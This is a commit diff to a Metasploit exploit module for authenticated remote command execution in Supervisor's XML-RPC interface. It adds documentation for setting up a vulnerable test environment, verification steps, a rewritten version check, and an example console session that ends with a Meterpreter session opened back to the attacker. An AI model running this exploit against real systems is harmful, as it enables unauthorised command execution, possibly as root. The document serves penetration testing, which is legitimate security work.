cleaned up version, and docs

documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md

@@ -4,25 +4,51 @@
   
   This has been tested with versions 3.2.0 and 3.3.2
 
+### Creating A Testing Environment
+
+  At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
+
+  1. ```sudo apt-get install supervisor```
+  2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
+
+    ```
+    [inet_http_server]         ; inet (TCP) server disabled by default
+    port=:9001        ; ip_address:port specifier, *:port for all iface
+    username=user              ; default is no username (open server)
+    password=123               ; default is no password (open server)
+    ```
+
+  3. Restart the service: `sudo service supervisor restart`
+
 ## Verification Steps
 
-  1. ```msf > use exploit/linux/http/supervisor_xmlrpc_exec```
-  2. ```msf > set lhost 192.168.0.2```
-  3. ```msf > set rhost 192.168.0.19```
-  4. ```msf > set httpusername user``` (optional)
-  5. ```msf > set httppassword 123``` (optional)
-  6. ```msf > exploit```
+  1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
+  2. ```set lhost [IP]```
+  3. ```set rhost [IP]```
+  4. ```set httpusername user```
+  5. ```set httppassword 123```
+  6. ```exploit```
   7. A meterpreter session should have been opened successfully
 
 ## Options
 
-  - `HttpUsername` - Username for HTTP basic auth (optional)
-  - `HttpPassword` - Password for HTTP basic auth (optional)
-  - `TARGETURI` - The path to the XML-RPC endpoint
+  **HttpUsername**
+
+  Username for HTTP basic auth which is set in the conf file(optional)
+
+  **HttpPassword**
+
+  Password for HTTP basic auth which is set in the conf file(optional)
+
+  **TARGETURI**
+
+  The path to the XML-RPC endpoint
 
 ## Scenarios
 
-  ```
+### Supervisor 3.2.0 on Xubuntu 16.04
+
+```
 msf > use exploit/linux/http/supervisor_xmlrpc_exec 
 msf exploit(supervisor_xmlrpc_exec) > set httpusername user
 httpusername => user
@@ -49,4 +75,4 @@ msf exploit(supervisor_xmlrpc_exec) > exploit
 [*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
 
 meterpreter > 
-```
+```

modules/exploits/linux/http/supervisor_xmlrpc_exec.rb

@@ -5,7 +5,7 @@
 
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
         can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
         The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
-        may be root. This vulnerability can only be exploited by an authenticated client or if supervisord has been
+        may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
         configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
       },
       'License'        => MSF_LICENSE,
@@ -59,12 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check_version(version_match)
-    maj = version_match[2]
-    min = version_match[3]
-    patch = version_match[5]
-
-    if maj.to_i == 3 and (patch.nil? or patch.to_i < 3)
+  def check_version(version)
+    if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
       return true
     else
       return false
@@ -73,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
 
-    print_status("Extracting version from web interface..")
+    print_status('Extracting version from web interface..')
 
     params = {
       'method'    => 'GET',
@@ -87,17 +83,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res
       if res.code == 200
-        match = res.body.match(/<span>((\d+)\.([\dab]+)(\.(\d+))?)<\/span>/)
+        match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
         if match
-          if check_version(match)
-            print_good("Vulnerable version found: #{match[1]}")
+          version = Gem::Version.new(match[1])
+          if check_version(version)
+            print_good("Vulnerable version found: #{version}")
             return Exploit::CheckCode::Appears
           else
-            print_bad("Version #{match[1]} is not vulnerable")
+            print_bad("Version #{version} is not vulnerable")
             return Exploit::CheckCode::Safe
           end
         else
-          print_bad("Could not extract version number from web interface")
+          print_bad('Could not extract version number from web interface')
           return Exploit::CheckCode::Unknown
         end
       elsif res.code == 401
@@ -108,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
         return Exploit::CheckCode::Unknown
       end
     else
-      print_bad("Error connecting to web interface")
+      print_bad('Error connecting to web interface')
       return Exploit::CheckCode::Unknown
     end
 
@@ -163,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
       end
     else
-      print_good("Request returned without status code, usually indicates success. Passing to handler..")
+      print_good('Request returned without status code, usually indicates success. Passing to handler..')
       handler
     end